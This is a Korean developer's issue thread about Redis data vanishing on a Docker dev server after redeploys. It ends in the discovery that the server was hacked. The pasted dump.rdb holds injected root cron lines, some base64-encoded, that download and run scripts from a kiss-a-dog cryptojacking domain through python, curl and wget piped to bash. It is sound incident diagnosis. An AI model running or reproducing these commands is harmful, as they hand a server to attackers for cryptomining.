[BE] 개발 서버 Redis 해킹당한 현상

[leesungbin]

이슈 내용

github action에 의해 재배포되면, 기존에 저장해두었던 redis / db에 있는 내용이 모두 사라지게 됩니다.

기대 결과

• 재배포되더라도 저장된 내용은 그대로 보존한다.

참고

• https://forums.docker.com/t/refresh-docker-image-without-touching-database/111586

[leesungbin]

• [Docker 기본(5/8)] Volume을 활용한 Data 관리

• 지금 상황 요약

  • redis 이미지가 재배포되면, 기존 데이터가 날아간다.
  • 서버 내부에서 docker compose up 을 했을 때는 날아가지 않았는데, CI에 의해 무언가 잘못 실행되고 있는 것일까?

[leesungbin]

• Docker 공식 문서 - Persist the DB

[leesungbin]

• 도커 강의 정리 ( 3강 : 스택(docker-compose.yml) )
  • 레디스는 인메모리 DB 인데 이 때문에 재배포할 때마다 데이터가 사라진다. DB 에 데이터를 영속화 하기 위해서 volumes 정보를 넣을 수 있다.

[leesungbin]

1:M 17 Nov 2022 07:51:23.268 * DB saved on disk
1:M 17 Nov 2022 07:51:23.644 * DB saved on disk
1:M 17 Nov 2022 07:51:25.012 * DB saved on disk
1:M 17 Nov 2022 07:51:25.398 * DB saved on disk
1:M 17 Nov 2022 07:51:25.581 * DB saved on disk
1:M 17 Nov 2022 07:51:26.923 * DB saved on disk
1:M 17 Nov 2022 07:51:27.486 * DB saved on disk

DB saved on disk가 실행되면서 레디스 내용이 초기화된다.

[leesungbin]

• Redis persistence

[leesungbin]

dump.rdb를 확인해보니, 해킹당한 것일 수도 있겠다는 생각이 든다.

REDIS0010�  redis-ver7.0.5�
redis-bits�@�ctime�b
                    vcused-mem�P�aof-base���backup4@�

@hourly root  python -c "import urllib2; print urllib2.urlopen('http://ki\s\s.a-d\og.t\op/t.sh').read()" >.1;chmod +x .1;./.1

backup3@c

*/4 * * * * root echo Y3VybCBodHRwOi8va2lzcy5hLWRvZy50b3AvYjJmNjI4L2Iuc2gK|base64 -d|bash|bash

backup2@o

*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL2tpc3MuYS1kb2cudG9wL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash

backup1@d

*/2 * * * * root echo Y2QxIGh0dHA6Ly9raXNzLmEtZG9nLnRvcC9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash

�iU0?���#

https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/

[leesungbin]

• Redis에 꼭 비밀번호를 걸어두자